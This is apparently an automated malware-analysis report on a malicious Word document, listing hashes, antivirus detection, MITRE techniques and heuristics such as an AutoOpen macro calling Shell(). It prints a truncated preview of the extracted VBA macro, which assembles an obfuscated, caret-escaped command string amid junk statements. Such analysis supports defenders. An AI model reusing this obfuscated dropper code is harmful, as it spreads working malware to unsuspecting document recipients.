Office (OLE) malware analysis — malicious · bbdfa6d962aad115

MALICIOUS

Office (OLE)

86.5 KB Created: 2018-08-27 21:45:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: 33e63037b35ee989f9ac8cb0f7492ca2 SHA-1: db115013c56aa86326cc5a2f2bf8abb2febab111 SHA-256: bbdfa6d962aad1150dde37e48a8d357c2ca792f938c810e6c21354c4daaa2442

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an intent to execute arbitrary commands. The presence of an AutoOpen macro further suggests automatic execution upon opening the document. No specific family could be identified, but the techniques used are common for macro-based malware.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6797106-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6797106-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10425 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10425 bytes
SHA-256: `5f945b79502c5431a9491f01c84d2d73395ae37651d609a13ec4624703f5ea50`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QWAVCmbWUGi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "vlIoOfNZCBLsbf" Function qInVro() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error jVpRhX / nUcdsa Error 7287 / 20391 BZMwQiNFZWq = "Md /" + "v/r " + Chr(0 + 4 + 3 + 1 + 26) + " ^" + "sE^T" + " " + "^ " + "^h^q^x" + "==^" + "=^" + "A" + "^Ag^AA" + "^I^A" Error tMCaD * 59093 * 14938 * QQGqqL Error OijvB / 7346 * sLjQt * pvvMZi Error 57039 * zfPzGA / 13644 * zihijA Error 79145 * 98804 / 40812 / iVwZw zDSBClTWPi = "ACA^g" + "^AA^" + "IA" + "AC^A^g" + "^AAIAA" + "C^A^" + "gA^A^I" + "^A^ACAg" + "^AA" Error cmLup / AaBkP Error 32553 / CzdWR * 66906 * 54826 Error rqFwI / GQpMjw * zAKQzX * kWiHjf Error 48041 / 45634 jcjuv = "^I^" + "AACAgA" + "^A" + "I^" + "A^0^H^A" Error mBImQ * 36203 / 50647 / tnnacw WdMbk = "9Bw" + "^e^Ag^" + "G^Aj" + "BA^dA" + "E" + "GA^" + "j" + "BQf" + "^A" + "s^D^ArB" + "^QYA^UG" + "^Ay^B" Error 72536 * jZIUW * 17598 / joiRDz Error 89634 * XupwjI Error PlnsoR / IwOdH / 64095 * jCiKjp TXPPwYoWfjd = "^g" + "^" + "Y" + "^As^" + "D^A^O^B" + "^wQ" + "^" + "A^Y^E" + "^A" + "^k^AA" + "I^A0" + "GA^lB^A" Error biRCr * qYUTEO * 68252 / 60492 Error tZYiBj / kzvQon / GLzOEf * arzEJp Error DXuobS / UnQzwU / zUdFYH * OjZMwB isrZic = "^d^A^k^" + "E" + "At^A" + "QZ^AsG" + "AvB" + "^g^" + "d^A^4G^" + "AJ^Bw^" + "OA" Error zmvnQ / ivzQOv Error lMIRHO * TwMaHz * 90493 * NVUJuI Error izDfT * bZsqtP Error 36254 * 95541 * 63073 * 49761 jkobZFaSstb = "^" + "kC^AOBw" + "^" + "QAYEA^k" + "AA^IA" + "wCATB^A" + "a^AY" + "^E^A" + "^k^" + "AAK" + "^A" + "UG^A^s^" Error 53668 / HTfni Error Jajmzm / XBkoj JILoNPPOiX = "B" + "^Qa" + "AYE^A" + "kBQ^YA" + "8^G^As^" + "BgbA" + "cHA" + "v" + "^B^A" + "R^A^4" + "C^A^y^" + "BQ" + "^Q^A^" Error sTfBlz / LrXlO / 5108 / WRUacI Error 9760 * PHhfK * LvCGN / uftMB Error 78593 / Umvulm jLOzFrd = "o^G^A" + "k" + "AweA^k" + "H^" + "A^y^B^A" + "^dA^s^H" + "Ap^A^gT" Error 75530 * BbcaG zPQFOk = "^" + "A8^" + "GA" + "^G" + "B" + "^AJA^" + "AC" + "A^uB" + "Q^a^A" + "^" qInVro = BZMwQiNFZWq + zDSBClTWPi + jcjuv + WdMbk + TXPPwYoWfjd + isrZic + jkobZFaSstb + JILoNPPOiX + jLOzFrd + zPQFOk Error ppCCw / jhOfw * wIOuK * EBrcv Error 45135 * OZlZR * 36537 / jUAKX Error 68981 * FMqkF * 90688 * sKTYQr End Function Function DOTEiQSoc() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 84827 * KaWQI Error 77849 * sijfU Error dBUHR / qsSpNM Error lIBFi / OpNArh RPalq = "ACATBAa" + "^AY" + "E^" + "A^k^A^A" + "^KAgG^A" + "^jB^Q" + "YA^UG^" + "AyBwbAY" + "^GA^" + "7^A^wJ" Error 8756 / Prlib Error 3661 / CAMrIn * 1048 / ouPdrF Error 78438 * hDaVQ / Lonbd * uVoOfC Error 19043 * 20807 / pjsSo / pPspLs Error 22109 * vuDbf / WkLSLp / pJKpkb VEhIdAOZwKA = "A^U^G" + "^A4^B" + "^QZA^4" + "CAn" + "^" + "AwKAYG" Error nzFFTB / 41292 / vNJNP / oiqJrI Error BZWfz * XWKqHz Error 72718 * olrHfb zfQBuwI = "A2^" + "B" + "^A^U^A" + "^QC^A" + "rA" + "wJ^" + "Aw^F" + "An^" + "A^wK^A" + "^M^GA" Error 14296 * HwVbVB Error 17558 / kihic * 514 / GNiXdw Error 38835 / LLSNQ / mnLzz * CZHSnl LdqipfOIGkh = "^p" + "BA^b" + "^A^I^G" + "^A1" + "B^A" + "cAoD^A" + "^2^B" + "g^b^" + "A^U^GA" + "^kAQ" Error nJhBiS * mwjwhs * 11735 * SJSizc Error jQBZUY * 72111 * 21284 / 73874 Error kfoZoh * UaQFfA EQDPfBfrzzR = "PA4E^AD" + "^B^gR" + "^AQCA^" + "7Aw" + "^" + "J^" Error 5830 / JoYaT Error oDvSia / Aqplcd / sKussp * 83137 Error 12486 * nzvNW * DdMuMf * XHVww MinrYjwzKj = "A^AD" + "A" + "^x^" + "A^wN" + "^AcCA" + "^g^A^Q" + "^" + "P^" + "A^" + "AC" + "AmBg^" + "d" + "AA^F^A" Error Gvowh / hiXiHl rWRmntTzist = "^k^Aw" + "O^A^kC^" + "AnAA^QA" + "c" + "CA" + "oA^A" + "d^A" + "kG" + "^" ... (truncated)

SHA-256: 5f945b79502c5431a9491f01c84d2d73395ae37651d609a13ec4624703f5ea50

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QWAVCmbWUGi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vlIoOfNZCBLsbf"
Function qInVro()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error jVpRhX / nUcdsa
   Error 7287 / 20391
BZMwQiNFZWq = "Md  /" + "v/r " + Chr(0 + 4 + 3 + 1 + 26) + " ^" + "sE^T" + " " + "^ " + "^h^q^x" + "==^" + "=^" + "A" + "^Ag^AA" + "^I^A"
Error tMCaD * 59093 * 14938 * QQGqqL
   Error OijvB / 7346 * sLjQt * pvvMZi
   Error 57039 * zfPzGA / 13644 * zihijA
   Error 79145 * 98804 / 40812 / iVwZw
zDSBClTWPi = "ACA^g" + "^AA^" + "IA" + "AC^A^g" + "^AAIAA" + "C^A^" + "gA^A^I" + "^A^ACAg" + "^AA"
Error cmLup / AaBkP
   Error 32553 / CzdWR * 66906 * 54826
   Error rqFwI / GQpMjw * zAKQzX * kWiHjf
   Error 48041 / 45634
jcjuv = "^I^" + "AACAgA" + "^A" + "I^" + "A^0^H^A"
Error mBImQ * 36203 / 50647 / tnnacw
WdMbk = "9Bw" + "^e^Ag^" + "G^Aj" + "BA^dA" + "E" + "GA^" + "j" + "BQf" + "^A" + "s^D^ArB" + "^QYA^UG" + "^Ay^B"
Error 72536 * jZIUW * 17598 / joiRDz
   Error 89634 * XupwjI
   Error PlnsoR / IwOdH / 64095 * jCiKjp
TXPPwYoWfjd = "^g" + "^" + "Y" + "^As^" + "D^A^O^B" + "^wQ" + "^" + "A^Y^E" + "^A" + "^k^AA" + "I^A0" + "GA^lB^A"
Error biRCr * qYUTEO * 68252 / 60492
   Error tZYiBj / kzvQon / GLzOEf * arzEJp
   Error DXuobS / UnQzwU / zUdFYH * OjZMwB
isrZic = "^d^A^k^" + "E" + "At^A" + "QZ^AsG" + "AvB" + "^g^" + "d^A^4G^" + "AJ^Bw^" + "OA"
Error zmvnQ / ivzQOv
   Error lMIRHO * TwMaHz * 90493 * NVUJuI
   Error izDfT * bZsqtP
   Error 36254 * 95541 * 63073 * 49761
jkobZFaSstb = "^" + "kC^AOBw" + "^" + "QAYEA^k" + "AA^IA" + "wCATB^A" + "a^AY" + "^E^A" + "^k^" + "AAK" + "^A" + "UG^A^s^"
Error 53668 / HTfni
   Error Jajmzm / XBkoj
JILoNPPOiX = "B" + "^Qa" + "AYE^A" + "kBQ^YA" + "8^G^As^" + "BgbA" + "cHA" + "v" + "^B^A" + "R^A^4" + "C^A^y^" + "BQ" + "^Q^A^"
Error sTfBlz / LrXlO / 5108 / WRUacI
   Error 9760 * PHhfK * LvCGN / uftMB
   Error 78593 / Umvulm
jLOzFrd = "o^G^A" + "k" + "AweA^k" + "H^" + "A^y^B^A" + "^dA^s^H" + "Ap^A^gT"
Error 75530 * BbcaG
zPQFOk = "^" + "A8^" + "GA" + "^G" + "B" + "^AJA^" + "AC" + "A^uB" + "Q^a^A" + "^"
qInVro = BZMwQiNFZWq + zDSBClTWPi + jcjuv + WdMbk + TXPPwYoWfjd + isrZic + jkobZFaSstb + JILoNPPOiX + jLOzFrd + zPQFOk
   Error ppCCw / jhOfw * wIOuK * EBrcv
   Error 45135 * OZlZR * 36537 / jUAKX
   Error 68981 * FMqkF * 90688 * sKTYQr
End Function
Function DOTEiQSoc()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 84827 * KaWQI
   Error 77849 * sijfU
   Error dBUHR / qsSpNM
   Error lIBFi / OpNArh
RPalq = "ACATBAa" + "^AY" + "E^" + "A^k^A^A" + "^KAgG^A" + "^jB^Q" + "YA^UG^" + "AyBwbAY" + "^GA^" + "7^A^wJ"
Error 8756 / Prlib
   Error 3661 / CAMrIn * 1048 / ouPdrF
   Error 78438 * hDaVQ / Lonbd * uVoOfC
   Error 19043 * 20807 / pjsSo / pPspLs
   Error 22109 * vuDbf / WkLSLp / pJKpkb
VEhIdAOZwKA = "A^U^G" + "^A4^B" + "^QZA^4" + "CAn" + "^" + "AwKAYG"
Error nzFFTB / 41292 / vNJNP / oiqJrI
   Error BZWfz * XWKqHz
   Error 72718 * olrHfb
zfQBuwI = "A2^" + "B" + "^A^U^A" + "^QC^A" + "rA" + "wJ^" + "Aw^F" + "An^" + "A^wK^A" + "^M^GA"
Error 14296 * HwVbVB
   Error 17558 / kihic * 514 / GNiXdw
   Error 38835 / LLSNQ / mnLzz * CZHSnl
LdqipfOIGkh = "^p" + "BA^b" + "^A^I^G" + "^A1" + "B^A" + "cAoD^A" + "^2^B" + "g^b^" + "A^U^GA" + "^kAQ"
Error nJhBiS * mwjwhs * 11735 * SJSizc
   Error jQBZUY * 72111 * 21284 / 73874
   Error kfoZoh * UaQFfA
EQDPfBfrzzR = "PA4E^AD" + "^B^gR" + "^AQCA^" + "7Aw" + "^" + "J^"
Error 5830 / JoYaT
   Error oDvSia / Aqplcd / sKussp * 83137
   Error 12486 * nzvNW * DdMuMf * XHVww
MinrYjwzKj = "A^AD" + "A" + "^x^" + "A^wN" + "^AcCA" + "^g^A^Q" + "^" + "P^" + "A^" + "AC" + "AmBg^" + "d" + "AA^F^A"
Error Gvowh / hiXiHl
rWRmntTzist = "^k^Aw" + "O^A^kC^" + "AnAA^QA" + "c" + "CA" + "oA^A" + "d^A" + "kG" + "^"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.